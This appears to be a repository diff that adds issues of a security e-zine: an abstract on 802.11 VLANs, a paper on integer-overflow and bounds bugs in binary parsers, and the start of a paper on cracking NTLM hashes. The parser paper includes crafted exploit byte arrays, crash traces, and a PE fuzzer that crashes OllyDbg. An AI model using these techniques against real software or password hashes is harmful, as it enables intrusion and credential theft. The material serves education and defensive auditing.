802.11 VLANs and Association Redirection
|
||||
Johnny Cache
|
||||
The goal of this paper is to introduce the reader to a technique that could be used to implement something analogous to VLANs found in wired media into a typical IEEE 802.11 environment. What makes this technique interesting is that it can be accomplished without breaking the IEEE 802.11 standard on the client side, and requires only minor changes made to the Access Point (AP). No modifications are made to the 802.11 MAC. It is the author's hope that after reading the paper the reader will not only understand the specific technique outlined below, but will consider protocol specifications with a new perspective in the future.
|
||||
html | pdf | txt
|
||||
|
2069
uninformed/3.1.txt
Normal file
2069
uninformed/3.1.txt
Normal file
File diff suppressed because it is too large
Load diff
1490
uninformed/3.2.txt
Normal file
1490
uninformed/3.2.txt
Normal file
File diff suppressed because it is too large
Load diff
599
uninformed/3.3.txt
Normal file
599
uninformed/3.3.txt
Normal file
|
@ -0,0 +1,599 @@
|
|||
Analyzing Common Binary Parser Mistakes
|
||||
Orlando Padilla
|
||||
xbud@g0thead.com
|
||||
Last modified: 12/05/2005
|
||||
|
||||
Abstract: With just about one file format bug being
|
||||
consistently released on a weekly basis over the past six to twelve
|
||||
months, one can only hope developers would look and learn. The
|
||||
reality of it all is unfortunate; no one cares enough. These bugs
|
||||
have been around for some time now, but have only recently gained
|
||||
media attention due to the large number of vulnerabilities being
|
||||
released. Researchers have been finding more elaborate and passive
|
||||
attack vectors for these bugs, some of which can even leverage a
|
||||
remote compromise.
|
||||
|
||||
No new attacks will be presented in this document, as examples and
|
||||
an example file format will be presented to demonstrate an insecure
|
||||
implementation of a parsing library. As a bonus for reading this
|
||||
article, an undisclosed bug in a popular debugger will be released
|
||||
during the case study material of this paper. This vulnerability,
|
||||
if leveraged properly, will cause the debugger to crash during the
|
||||
loading of a binary executable or dynamic library.
|
||||
|
||||
Disclaimer: This document is written with an educational
|
||||
interest and I cannot be held liable for any outcome of the
|
||||
information being released.
|
||||
|
||||
|
||||
Thanks: #vax, nologin, and jimmy haffa
|
||||
|
||||
= Introduction
|
||||
|
||||
|
||||
A number of papers have already been written describing the
|
||||
exploitation of integer overflows, however, very few publications
|
||||
have been aimed at the exploitation of integer overflows within
|
||||
binary parsers. The current slew of advisories released by iDefense
|
||||
(Clam AV, Adobe Acrobat), eEye (Macro Media, Windows Metafile) and
|
||||
Alex Wheeler via Rem0te.com (Multiple AV Vendors) on file format
|
||||
bugs should be enough to take these bugs seriously.
|
||||
|
||||
|
||||
The most common mistake applied by a programmer is in trusting a
|
||||
field inside a binary structure that should not be trusted. During
|
||||
the design phase: efficiency, simplicity and the secure
|
||||
implementation of a particular project should be at the top of the
|
||||
priority list. When dealing with data that cannot be presented only
|
||||
as strings, a length field is required to tell the application when
|
||||
to stop reading. When dealing with sections that must have
|
||||
subsections, knowing ahead of time how many sections are embedded
|
||||
within the primary section of a structure is required and again, a
|
||||
value must be used to instruct the application only to iterate
|
||||
x number of times. In the following paragraphs, the
|
||||
description of a binary file structure will be presented, followed
|
||||
by applied examples of typical coding errors encountered when
|
||||
auditing applications. An overview of integer overflows will be
|
||||
discussed for the sake of completeness. Finally, a case study of
|
||||
several bugs found during the research of a particular file format
|
||||
will be shown.
|
||||
|
||||
= Certificate Storage File
|
||||
|
||||
|
||||
The following file format was designed and written specifically for
|
||||
this article and has no real world applicable use. The general idea
|
||||
behind the implementation of this file format is to create a single
|
||||
binary file acting as a searchable database for certificate files.
|
||||
The file will consist of two core structures, which will hold the
|
||||
information necessary to parse the certificates in DER format. This
|
||||
is a rough diagram of what the file looks like after compilation:
|
||||
|
||||
+----------------------+-----------+---------+
|
||||
| Structure | Offset | Size |
|
||||
+----------------------+-----------+---------+
|
||||
| OP Header | 0 | 4 |
|
||||
| Element Count | 4 | 2 |
|
||||
| Cert File Fmt Struct | 6 | 6 |
|
||||
| Cert Data Struct | 12 | 16 |
|
||||
| Cert 1 | | |
|
||||
| Cert 2 | | |
|
||||
| Cert | | |
|
||||
| Cert n | | |
|
||||
+----------------------+-----------+---------+
|
||||
|
||||
|
||||
= Binary Layout
|
||||
|
||||
|
||||
|
||||
The following structures are defined on the file format's compiler
|
||||
library.
|
||||
|
||||
|
||||
typedef struct _CERTFF
|
||||
{
|
||||
unsigned int NumberOfCerts;
|
||||
unsigned short PointerToCerts;
|
||||
}CERTFF,*PCERTFF;
|
||||
|
||||
typedef struct _CERTDATA
|
||||
{
|
||||
char Name[8];
|
||||
unsigned short CertificateLen;
|
||||
unsigned short PointerToDERs;
|
||||
unsigned char *DataPtr;
|
||||
}CERTDATA,*PCERTDATA;
|
||||
|
||||
|
||||
The first data structure consists of two unsigned integers, (short)
|
||||
NumberOfCerts and (long) PointerToCerts. These hold the number of
|
||||
certificates in total, stored in this binary NumberOfCerts and the
|
||||
offset from the beginning of the file to the first certificate data
|
||||
structure CERTDATA PointerToCerts. We can already assume that a
|
||||
parser will iterate through the image file NumberOfCerts times,
|
||||
starting from PointerToCerts in chunks of the size of CERTDATA at a
|
||||
time. The second data structure consists of a character array 8
|
||||
bytes in size, which is used to hold the first 7 characters of a
|
||||
certificate's description, followed by two unsigned short integers
|
||||
which hold the length of the certificate referred to by this
|
||||
structure, and the offset to the beginning of the certificate
|
||||
respectively. The last element is an unsigned char, which is used
|
||||
to carry the body of the certificate by the compiler.
|
||||
|
||||
= Applied Examples
|
||||
|
||||
|
||||
As the number of buffer overflows decreases, the number of integer
|
||||
overflows and improper file and binary protocol parsing bugs
|
||||
increases. The following URL query to OSVDB's (Open Source
|
||||
Vulnerability) database for integer overflows is a perfect example
|
||||
of the diversity of applications affected. The list is rather short
|
||||
considering the number of vulnerabilities actually released in the
|
||||
past two - three years. Still, it accurately displays different
|
||||
levels of severity: Kernel, Library, Protocol and file format bugs.
|
||||
|
||||
http://osvdb.org/searchdb.php?action=search_title&vuln_title=integer+overflow&Search=Search
|
||||
|
||||
|
||||
As a proof of concept, I developed a parsing library for the
|
||||
construct above. See Appendix A for code. The code functionality
|
||||
is simple. As explained above it consolidates certificates (in this
|
||||
example) into a single file. There are several bugs in the library
|
||||
that I mocked from actual implementations of different open source
|
||||
and closed source applications. The first vulnerability exists in
|
||||
the single cert extraction tool 'certextract.c'. The issue is
|
||||
pretty obvious; the library trusts that the file being parsed has
|
||||
not been tampered with. The following code snippet highlights the
|
||||
issue:
|
||||
|
||||
|
||||
igned char cert_out[MAX_CERT_SIZE];
|
||||
16 unsigned char *extract_cert = "req1.DER";
|
||||
...
|
||||
64 pCertData = (PCERTDATA)(image + get_cert(image,extract_cert));
|
||||
65
|
||||
66 memcpy(cert_out,(image + pCertData->PointerToDERs), pCertData->CertificateLen);
|
||||
...
|
||||
|
||||
|
||||
The vulnerability exists because the library assumes the certificates
|
||||
will not be larger than MAX_CERT_SIZE due to the compiler's
|
||||
inability to take files larger than the set size. All an attacker has
|
||||
to do is modify the file using an external editor or reverse engineering
|
||||
the file format and creating a malicious certificate db. A step-by-step
|
||||
example on exploitation of this bug is out of the scope of this
|
||||
document, but let's look at what has to be done to prepare an exploit
|
||||
for this vulnerability.
|
||||
|
||||
|
||||
We already know we have to modify the length field to something
|
||||
larger than MAX_CERT_SIZE or if we look specifically at
|
||||
'certlib.h', larger than 2048 bytes. Looking at the structure of
|
||||
the headers, we can see that each certificate has its own length
|
||||
field. So creating a valid structure header and placing it at a
|
||||
correct offset along with a corresponding payload should do the
|
||||
trick. With this in mind, calculate the number of bytes from the
|
||||
beginning of the file to the first certificate.
|
||||
|
||||
|
||||
[SIG 4 bytes][Element Count 2 bytes][First Struct 6 bytes][Our Fake Cert Struct]
|
||||
|
||||
|
||||
It seems we can drop our fake structure after the 12th byte. The
|
||||
cert structure will look something like the following (depending on
|
||||
the size of the payload you are using):
|
||||
|
||||
|
||||
unsigned char exploit_dat1[] = {
|
||||
|
||||
/* Name of our fake cert */
|
||||
0x72, 0x65, 0x71, 0x31, 0x2e, 0x44, 0x45, 0x00,
|
||||
/* our, length */
|
||||
0x53, 0x08,
|
||||
/* where we can write our data, PointerToDer*/
|
||||
0x18, 0x00,
|
||||
/* DataPtr just for completion */
|
||||
0x00, 0x00, 0x00, 0x00
|
||||
};
|
||||
|
||||
|
||||
Notice the length is an unsigned short integer that limits our payload
|
||||
to 0xFFFF (65535), which should be more than enough space. The
|
||||
two most important sections of our structure are the length, and the value
|
||||
we give PointerToDer since this will point to the beginning of our
|
||||
payload. Since we are choosing to make our fake certificate the first
|
||||
one on the list, anything below it can be overwritten with little
|
||||
concern. At offset 0x18 of the dat file we have 0x0853
|
||||
bytes of A's, notice there is no bounds check on this value. Below is a
|
||||
sample run of a valid certsdb.dat file and a second sample run with our
|
||||
malicious dat file.
|
||||
|
||||
|
||||
(xbud@yakuza <~/code/random>) $./certextract certsdb.dat out.DER
|
||||
cert req1.DE
|
||||
len: 657 PtrToData: 90
|
||||
|
||||
(xbud@yakuza <~/code/random>) $md5sum req1.DER out.DER
|
||||
e3e45e30b18a6fc9f6134f0297485cc1 req1.DER
|
||||
e3e45e30b18a6fc9f6134f0297485cc1 out.DER
|
||||
|
||||
(gdb) r ./badcertdb.dat out.DER
|
||||
Starting program: /home/xbud/code/random/certextract ./badcertdb.dat out.DER
|
||||
cert req1.DE
|
||||
len: 2131 PtrToData: 27
|
||||
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
0x41414141 in ?? ()
|
||||
|
||||
|
||||
The actual exploitation of this vulnerability is left as an exercise
|
||||
for the reader, given the file structure necessary to build the attack
|
||||
it is now trivial to complete.
|
||||
|
||||
= Continuing Applied Examples
|
||||
|
||||
|
||||
The utility 'certdb2der.c' provided in this example suite iterates
|
||||
through the dat file and dumps the contents of each certificate into
|
||||
individual files. The CERTFF (Certificate File Format) structure
|
||||
contains an element called NumberOfCerts of type unsigned int. This
|
||||
integer explicitly controls the loop iterator, controlling the number
|
||||
of CERTDATA structures said to be in the body of dat file.
|
||||
|
||||
|
||||
59 pCertFF = (PCERTFF)(image + OFFSET_TO_CERT_COUNT);
|
||||
60 alloc_size = (pCertFF->NumberOfCerts + 1) * sizeof(CERTDATA);
|
||||
61
|
||||
62 pCertData = (PCERTDATA)malloc(alloc_size);
|
||||
63
|
||||
64 memcpy(pCertData,(image + pCertFF->PointerToCerts),alloc_size - 1);
|
||||
|
||||
|
||||
An integer overflow condition may be triggered during memory allocation
|
||||
for the 'pCertData' array of structures. If a specially crafted dat
|
||||
file contains a high enough value during memory allocation, pCertDat
|
||||
array is deemed inproper by the multiplication in
|
||||
line 60 (pCertFF->NumberOfCerts + 1) * sizeof(CERTDATA).
|
||||
The maximum value for an unsigned integer is (4294967295) or
|
||||
0xffffffff, so when the value at NumberOfCerts is multiplied
|
||||
by sizeof(CERTDATA) or 16 bytes an overflow occurs causing the value
|
||||
to wrap resulting in an invocation negative malloc() or a malloc(0).
|
||||
This could then be leveraged into executing arbitrary code on certain
|
||||
malloc implementations by overwriting control structures in the heap.
|
||||
Again, exploitation is not covered in detail, but pre-exploitation is
|
||||
explained below. Please refer to the references section for papers
|
||||
covering heap overflow exploitation.
|
||||
|
||||
|
||||
Constructing a fake valid CERTFF chunk and properly placing it in a dat
|
||||
file will be what most of the work consists of when preparing for file
|
||||
format exploit. The first 6 bytes of our file will remain the same, so
|
||||
we can assume our exploit to look something to the following:
|
||||
|
||||
|
||||
[ 4 ][ 2 ][ 6 ][Cert 1][Cert 2][Cert ...]
|
||||
[SIG][Element Count][Fake Number of Certs + 2 bytes][Our Fake Certs ]
|
||||
|
||||
|
||||
unsigned char exploit_dat1[] = {
|
||||
/* header info */
|
||||
0x4f, 0x50, 0x00, 0x00, 0x01, 0x00,
|
||||
/* our length followed by our certs pointer */
|
||||
0xff, 0xff, 0xff, 0xff,
|
||||
0x0a, 0x00,
|
||||
/* One valid cert */
|
||||
0x70, 0x65, 0x71, 0x31, 0x2e, 0x44, 0x45, 0x00,
|
||||
/* our length */
|
||||
0x00, 0x07,
|
||||
/* where we can write our data to PointerToDer*/
|
||||
0x00, 0x26,
|
||||
/* DataPtr useless to us */
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
};
|
||||
|
||||
unsigned char exploit_dat2[] = {
|
||||
/* fake certs for fill */
|
||||
0x41, 0x41, 0x41, 0x41, 0x2e, 0x41, 0x41, 0x00,
|
||||
/* our length */
|
||||
0x00, 0x10,
|
||||
/* where we can write our data to PointerToDer*/
|
||||
0x26, 0x04,
|
||||
/* DataPtr useless to us */
|
||||
0x00, 0x00, 0x00, 0x00,
|
||||
};
|
||||
|
||||
|
||||
The pseudo code below denotes the structure of the rest of the binary
|
||||
dat file.
|
||||
|
||||
|
||||
for(i = sizeof(exploit_dat1); i < buf.length; i+= sizeof(exploit_dat2))
|
||||
memcopy(buf + i,exploit_dat2, sizeof(exploit_dat2));
|
||||
|
||||
|
||||
In short, the code copies the contents of our second structure
|
||||
, after the 24th byte till the end of the buffer is
|
||||
reached. The following displays an iteration of the utility used correctly,
|
||||
followed by an iteration through the malicious certificates db file.
|
||||
|
||||
|
||||
(xbud@yakuza <~/code/random>) $./certdb2der reqs/certsdb.dat
|
||||
req1.DE of length: 657 is being written to disk...
|
||||
req2.DE of length: 649 is being written to disk...
|
||||
req3.DE of length: 653 is being written to disk...
|
||||
req4.DE of length: 651 is being written to disk...
|
||||
req5.DE of length: 652 is being written to disk...
|
||||
(xbud@yakuza <~/code/random>) $
|
||||
|
||||
(gdb) r 2badcertdb.dat
|
||||
Starting program: /home/xbud/code/random/certdb2der 2badcertdb.dat
|
||||
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
0xb7e1267f in memcpy () from /lib/tls/libc.so.6
|
||||
(gdb) x/i $pc
|
||||
0xb7e1267f <memcpy+47>: repz movsl %ds:(%esi),%es:(%edi)
|
||||
(gdb)i reg
|
||||
eax 0xffffffff -1
|
||||
ecx 0x3fff9c02 1073716226
|
||||
edx 0x804a008 134520840
|
||||
...
|
||||
|
||||
|
||||
Reconstructing our memcpy(buf,edx (our fake certs), eax (-1)), the value
|
||||
stored in eax is -1 which when converted to unsigned inside memcpy, 4GB
|
||||
of data are copied into our destination buffer of only 0x800 bytes in
|
||||
size.
|
||||
|
||||
= Case Study
|
||||
= The Microsoft PE/COFF Headers
|
||||
|
||||
|
||||
There a number of documents and tools out there that explain the
|
||||
structure of Microsoft's infamous PE (Portable Executable) and old
|
||||
Unix Style COFF (Common Object File Format) header. As such, I will
|
||||
refrain from elaborating on what each element inside each structure
|
||||
does. Instead, I will focus on the critical sections that may allow
|
||||
an attacker to alter the contents of header elements specifically to
|
||||
break implementations of PE/COFF parsers.
|
||||
|
||||
|
||||
With that in mind we can now begin our journey into the world of PE.
|
||||
At file offset 0x3C as specified in MS's pecoff.doc, there is a four
|
||||
byte signature PE, immediately after the signature of the
|
||||
image file, there is a standard COFF header of the following format:
|
||||
|
||||
|
||||
IMAGE_FILE_HEADER //(Coff)
|
||||
{
|
||||
unsigned short Machine;
|
||||
unsigned short NumberOfSections;
|
||||
unsigned int TimeDateStamp;
|
||||
unsigned int PointerToSymbolTable;
|
||||
unsigned int NumberOfSymbols;
|
||||
unsigned short SizeOfOptionalHeader;
|
||||
unsigned short Characteristics;
|
||||
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
|
||||
|
||||
|
||||
Does anything look similar to our hypothetical file format used in
|
||||
the examples above?
|
||||
|
||||
|
||||
NumberOfSections and NumberOfSymbols are all synonymous to
|
||||
NumberOfCerts with respect to their own file format. These
|
||||
elements, along with SizeOfOptionalHeader make for interesting
|
||||
attack vectors. Before strolling further along into the COFF Header
|
||||
specifics, it is important to pay a bit more attention to the offset
|
||||
0x3C being referred to in the PECOFF.doc document. It
|
||||
states that the file offset specified at offset 0x3C from
|
||||
the image file, points to the PE signature.
|
||||
|
||||
|
||||
What would happen if this file offset was bogus? What if the offset
|
||||
at offset 0x3C points to fstat(image).st_size + 1 ?
|
||||
We cause the parser to access illegal memory. This bug was present in
|
||||
the majority of the PE Viewers tested. Although the significance of this
|
||||
bug is minimal since the modified binary will no longer execute, picture a
|
||||
scenario where an attacker simply needs to crash an application which
|
||||
happens to preprocess a PE Header? All an attacker must do to trigger
|
||||
this bug is build a fake MZ header also known as a Dos Stub header and
|
||||
invalidate the 0x3C offset. The MS-DOS Stub is a
|
||||
valid application that runs under MS-DOS and is placed at the front of the
|
||||
.EXE image. The linker places a default stub here, which prints out the
|
||||
message "This program cannot be run in DOS mode" when the image is run in
|
||||
MS-DOS.
|
||||
|
||||
|
||||
The second element, NumberOfSections, indicates the number of
|
||||
Section Headers this file has mapped. Once again, fuzzing this
|
||||
element with random numbers yields interesting results on tools
|
||||
like, MSVC dumpbin.exe, PEView, PE Explorer, msfpescan etc...
|
||||
|
||||
|
||||
Continuing our dive into PE madness, following the COFF Header there
|
||||
is an OPTIONAL_HEADER also referred to as the PE Header which
|
||||
consists of the following elements:
|
||||
|
||||
|
||||
_IMAGE_OPTIONAL_HEADER32 {
|
||||
unsigned short Magic;
|
||||
...
|
||||
unsigned int ImageBase;
|
||||
...
|
||||
unsigned short MajorOperatingSystemVersion;
|
||||
unsigned short MinorOperatingSystemVersion;
|
||||
...
|
||||
unsigned int SizeOfImage;
|
||||
unsigned int SizeOfHeaders;
|
||||
...
|
||||
unsigned int LoaderFlags;
|
||||
unsigned int NumberOfRvaAndSizes;
|
||||
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
|
||||
} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;
|
||||
|
||||
|
||||
There were a number of elements omitted here for the sake of brevity,
|
||||
most of which aid the loader in identifying the type of file and its
|
||||
core mappings. Please refer to the appendix for more information on
|
||||
what each specific element means. Again, several elements in this
|
||||
structure look interesting enough to play with, however we will only be
|
||||
looking at the IMAGE_DATA_DIRECTORY array of entries. In
|
||||
particular, the first index of that directory contains a pointer to the
|
||||
structures. The element EXPORT/IMPORT_DIRECTORY_TABLE
|
||||
NumberOfRvaAndSizes in the structure above refers to the number of
|
||||
elements in the DataDirectory array. The following is the
|
||||
structure which is the last structure
|
||||
fuzzed for this case study.
|
||||
|
||||
|
||||
|
||||
_EXPORT_DIRECTORY_TABLE {
|
||||
unsigned long Characteristics;
|
||||
unsigned long TimeDateStamp;
|
||||
unsigned short MajorVersion;
|
||||
unsigned short MinorVersion;
|
||||
unsigned long NameRVA;
|
||||
unsigned long OrdinalBase;
|
||||
unsigned long NumberOfFunctions;
|
||||
unsigned long NumberOfNames;
|
||||
unsigned long ExportAddressTableRVA;
|
||||
unsigned long ExportNameTableRVA;
|
||||
unsigned long ExportOrdinalTableRVA;
|
||||
} EXPORT_DIRECTORY_TABLE, *PEXPORT_DIRECTORY_TABLE;
|
||||
|
||||
|
||||
The Export Directory Table contains address information that is
|
||||
used to resolve fix-up references to the entry points within this image.
|
||||
The elements NumberOfFunctions, NumberOfNames indicate the obvious and
|
||||
again if something trusts the number in this structure without error
|
||||
checking, unexpected results can occur.
|
||||
|
||||
= Introducing breakdance.c
|
||||
|
||||
|
||||
Although file fuzzing is relatively simple, tools help reduce the amount
|
||||
of time it takes for you to reconstruct a format to reach deep into a
|
||||
section buried within several structures. I typically use
|
||||
xxd -i, hd (hexdump), or shred (hexeditor)
|
||||
for windows to reconstruct a binary image and fuzz the structures
|
||||
manually, but I decided to develop a tool to do the work for me in the
|
||||
case of PE. The following options are available:
|
||||
|
||||
|
||||
Usage: ./breakdance [parameters]
|
||||
Options:
|
||||
-v verbose
|
||||
-o [file] File to write to (defaults) out.ext
|
||||
-f [file] File to read from
|
||||
-e [value] Modify Export Directory Table's number
|
||||
of functions and number of names
|
||||
-p Print sections of a PE file and exit
|
||||
-c Create new section (.pepe) not to be used with -m
|
||||
-s [section] Section to overwrite (can be used with -c)
|
||||
-m [section] [value]
|
||||
-n [length] Fuzz Export Directory Table's Strings
|
||||
Modify [section] with [int] where:
|
||||
section is one of [image_start] [number_of_sections]
|
||||
|
||||
ex. ./breakdance -v -o out -f pebin -m "image_start" 65536
|
||||
ex. ./breakdance -v -o out -f pebin -c -s .rdata
|
||||
|
||||
[Warning if -o option isn't provided with mod options, changes are discarded]
|
||||
|
||||
|
||||
The following is a list of binary parsers affected by the fuzzing options
|
||||
provided by breakdance.c, the list is by no means comprehensive in the
|
||||
sense of PE parsers but it is all I test against. The fuzzing capabilities
|
||||
are rather minimal considering the number of structures and elements
|
||||
accompanied by the PE/COFF specification, however it is enough to
|
||||
demonstrate how broken, binary parsers can be.
|
||||
|
||||
|
||||
+--------------+-----------------+-------------------+
|
||||
| Tool Name | Vendor | Section |
|
||||
+--------------+-----------------+-------------------+
|
||||
| PE View | Wayne Radburn | All |
|
||||
| MSVS bindump | Microsoft | All |
|
||||
| OllyDbg | Oleh Yuschuk | NumberOfFunctions |
|
||||
| PE Explorer | Haeventools.com | NumberOfSections |
|
||||
+--------------+-----------------+-------------------+
|
||||
|
||||
|
||||
= Affected Toolsets
|
||||
|
||||
|
||||
|
||||
Although I can almost guarantee other parsers are just as buggy,
|
||||
this selection is pretty well known and should suffice as a
|
||||
demonstration. The only issue I will elaborate on is the OllyDebug
|
||||
denial of service attack. This issue is interesting due to the fact
|
||||
that even after modifying the PE Image to DoS OllyDebug, the binary
|
||||
itself is still executable. This can be leveraged as an attack
|
||||
vector against reverse engineerers who rely on olly debug to reverse
|
||||
binaries. The following is a run of breakdance against a DLL.
|
||||
|
||||
|
||||
(xbud@yakuza <~/code/random>) $./breakdance -v -e 4294967295 -f \
|
||||
/home/xbud/code/libpe/testbins/vncdll.dll -o vnc.dll
|
||||
|
||||
...
|
||||
|
||||
NumberOfFunctions 58, NumberOfNames: 58, now 2147483647,2147483647
|
||||
Dumping 348160 bytes
|
||||
|
||||
(xbud@yakuza <~/code/random>) $
|
||||
|
||||
-- Inside WinDbg --
|
||||
|
||||
This exception may be expected and handled.
|
||||
eax=005d44d0 ebx=0000049c ecx=005d46c8 edx=000001f8 esi=01ed0465 edi=00000000
|
||||
eip=0045cda4 esp=0012e70c ebp=0012ede8 iopl=0 nv up ei ng nz ac pe cy
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000293
|
||||
|
||||
*** WARNING: Unable to verify checksum for C:\tools\odbg110\OLLYDBG.EXE
|
||||
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
|
||||
C:\tools\odbg110\OLLYDBG.EXE -
|
||||
|
||||
OLLYDBG!Createlistwindow+0x1bb4:
|
||||
0045cda4 668b0459 mov ax,[ecx+ebx*2] ds:0023:005d5000=????
|
||||
|
||||
0:000> kb
|
||||
ChildEBP RetAddr Args to Child
|
||||
WARNING: Stack unwind information not available. Following frames may be wrong.
|
||||
0012ede8 0045f7eb 01ed0465 76bf1f1c 76bf2075 OLLYDBG!Createlistwindow+0x1bb4
|
||||
00000000 00000000 00000000 00000000 00000000 OLLYDBG!Decoderange+0x180b
|
||||
|
||||
|
||||
= Conclusions
|
||||
|
||||
|
||||
The general rule of thumb here is not to trust any user modifiable
|
||||
data. The trust between application and input components such as
|
||||
sockets, file I/O, named pipes etc. should always be minimal and at
|
||||
an extreme, should be considered dangerous. The fact that a file
|
||||
format specification exists is not an excuse to assume all data
|
||||
gathered from an alleged file is valid. Validate your input against
|
||||
a working ruleset, and if the assertion fails, raise an exception.
|
||||
Keeping your code simple means accept only valid input, deny all
|
||||
variants.
|
||||
|
||||
|
||||
All the code referenced is provided in the attached tar ball, a
|
||||
safer version of the library for parsing the hypothetical file
|
||||
format developed for this paper is included for demonstration
|
||||
purposes.
|
||||
|
||||
= Bibliography
|
||||
|
||||
|
||||
OSVDB. OSVDB Advisory Descriptions
|
||||
http://www.osvdb.org
|
||||
|
||||
|
||||
Microsoft Corporation. PECoff Specification
|
||||
http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx
|
||||
|
||||
|
||||
blexim. Integer Overflows
|
||||
http://www.phrack.org/show.php?p=60&a=10
|
458
uninformed/3.4.txt
Normal file
458
uninformed/3.4.txt
Normal file
|
@ -0,0 +1,458 @@
|
|||
Attacking NTLM with Precomputed Hashtables
|
||||
warlord
|
||||
warlord@nologin.org
|
||||
|
||||
|
||||
1) Introduction
|
||||
|
||||
|
||||
Breaking encrypted passwords has been of interest to hackers for a long
|
||||
time, and protecting them has always been one of the biggest security
|
||||
problems operating systems have faced, with Microsoft's Windows being no
|
||||
exception. Due to errors in the design of the password encryption
|
||||
scheme, especially in the LanMan(LM) scheme, Windows has a bad track in
|
||||
this field of information security. Especially in the last couple of
|
||||
years, where the outdated DES encryption algorithm that LanMan is based
|
||||
on faced more and more processing power in the average household,
|
||||
combined with ever increasing harddisk size, made it crystal clear that
|
||||
LanMan nowadays is not just outdated, but even antiquated.
|
||||
|
||||
Until now, breaking the LanMan hashed password required somehow
|
||||
accessing the machine first of all, and grabbing the password file,
|
||||
which didn't render remote password breaking impossible, but as a remote
|
||||
attacker had to break into the system first to get the required data, it
|
||||
didn't matter much. This paper will try to change this point of view.
|
||||
|
||||
|
||||
2) The design of LM and NTLM
|
||||
|
||||
2.1) The LanMan disaster
|
||||
|
||||
|
||||
By default Windows stores all users passwords with two different hashing
|
||||
algorithms. The historically weak LanMan hash and the more robust MD4.
|
||||
The LanMan hash is based on DES and has been described in Mudge's rant
|
||||
on the topic. A brief recap of the LM hash is below, though those
|
||||
unfamilliar with LM will probably want to read.
|
||||
|
||||
First of all, Windows takes a password and makes sure it's 14 bytes
|
||||
long. If it's shorter than 14 bytes, the password is padded with null
|
||||
bytes. Brute forcing up to 14 characters can take a very long time, but
|
||||
two factors make this task way more easy. First, not only is the set of
|
||||
possible characters rather small, Microsoft further reduces it by making
|
||||
sure a password is stored all uppercase. That means "test" is the same
|
||||
as "Test" is the same as "tesT" is the same as...well...you get the
|
||||
idea. Second, the password is not really 14 bytes in size. Windows
|
||||
splits it up into two times 7 bytes. So instead of having to brute force
|
||||
up to 14 bytes, an attacker only has to break 7 bytes, twice. The
|
||||
difference is (keyspace^14) versus (keyspace^7)*2. That's a huge
|
||||
difference.
|
||||
|
||||
Concerning the keyspace, this paper focuses on the alphanumerical set of
|
||||
characters only, but the entire possible set of valid characters is:
|
||||
|
||||
|
||||
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 %!@\#$%^&*()_-=+`~[]\{}|\:;"'<>,.?/
|
||||
|
||||
|
||||
The next problem with LM stems from the total lack of salting or cipher
|
||||
block chaining in the hashing process. To hash a password the first 7
|
||||
bytes of it are transformed into an 8 byte odd parity DES key. This key
|
||||
is used to encrypt the 8 byte string "KGS!@". Same thing happens with
|
||||
the second part of the password.
|
||||
|
||||
This lack of salting creates two interesting consequences. Obviously
|
||||
this means the password is always stored in the same way, and just begs
|
||||
for a typical lookup table attack. The other consequence is that it is
|
||||
easy to tell if a password is bigger than 7 bytes in size. If not, the
|
||||
last 7 bytes will all be null and will result in a constant DES hash of
|
||||
0xAAD3B435B51404EE.
|
||||
|
||||
As I already pointed out, LM has been extensively documented.
|
||||
"L0phtcrack" and "John the Ripper" are both able brute force tools to
|
||||
break these hashes, and Philippe Oechslin of the ETH Zuerich was the
|
||||
first to precompute LM lookup tables that allow breaking these hashes in
|
||||
seconds.
|
||||
|
||||
2.2) NTLM
|
||||
|
||||
|
||||
Microsoft attempted to address the shortcomings of LM with NTLM. Windows
|
||||
NT introduced the NTLM(NT LanManager) authentication method to provide
|
||||
stronger authentication. The NTLM protocol was originally released in
|
||||
version 1.0(NTLM), and was changed and fortified in NT SP6 as NTLMv2.
|
||||
When exchanging files between hosts in a local area network, printing
|
||||
documents on a networked printer or sending commands to a remote system,
|
||||
Windows uses a protocol called CIFS - the Common Internet File System.
|
||||
CIFS uses NTLM for authentication.
|
||||
|
||||
In NTLM, the protocol covered in this document, the authentication works
|
||||
in the following manner. When the client connects to the server and
|
||||
requests a new session, the server replies with a positive session
|
||||
response. Next, the client sends a request to negotiate a protocol for
|
||||
one of the many dialects of the SMB/CIFS family by providing a list of
|
||||
dialects that it understands. The server picks the best out of those and
|
||||
sends the client a response that names the protocol to use, and includes
|
||||
a randomly generated 8 byte challenge.
|
||||
|
||||
In order to log in now, the client sends the username in plaintext(!),
|
||||
and also the password, hashed NTLM style. The NTLM hash is generated in
|
||||
the following manner:
|
||||
|
||||
|
||||
[UsersPassword]->[LMHASH]->[NTLM Hash]
|
||||
|
||||
|
||||
The NTLM hash is produced by the following algorithm. The client takes
|
||||
the 16 byte LM hash, and appends 5 null bytes, so that the result is a
|
||||
string of 21 bytes length. Then it splits those 21 bytes into 3 groups
|
||||
of 7 bytes. Each 7 byte string is turned into an 8 byte odd parity DES
|
||||
key once again. Now the first key is used to encrypt the challenge with
|
||||
the DES algorithm, producing an 8 byte hash. The same is done with keys
|
||||
2 and 3, so that there are two additional 8 byte hashes. These 3 hashes
|
||||
are simply concatenated, resulting in a single 24 byte hash, which is
|
||||
the one being sent by the client as the encrypted password.
|
||||
|
||||
Mudge already pointed out why this is really stupid, and I'll just
|
||||
recapitulate his reasons here. An attacker capable of sniffing traffic
|
||||
can see the username, the challenge and the 24 byte hash.
|
||||
|
||||
First of all, as stated earlier, if the password is less than 8 bytes,
|
||||
the second half of the LM hash always is 0xAAD3B435B51404EE. For the
|
||||
purpose of illustration, let's assume the first part of the hash is
|
||||
0x1122AABBCCDDEEFF. So the entire LM hash looks like:
|
||||
|
||||
|
||||
-------------------------------------------
|
||||
| 0x1122AABBCCDDEEFF | 0xAAD3B435B51404EE |
|
||||
-------------------------------------------
|
||||
|
||||
|
||||
When transforming this into an NTLM hash, the first 8 bytes of the new
|
||||
hash are based solely on the first 7(!) bytes of the LM hash. The second
|
||||
8 byte chunk of the NTLM hash is based on the last byte of the first LM
|
||||
hash, and first 6 bytes of the second LM hash. Now there are 2 bytes of
|
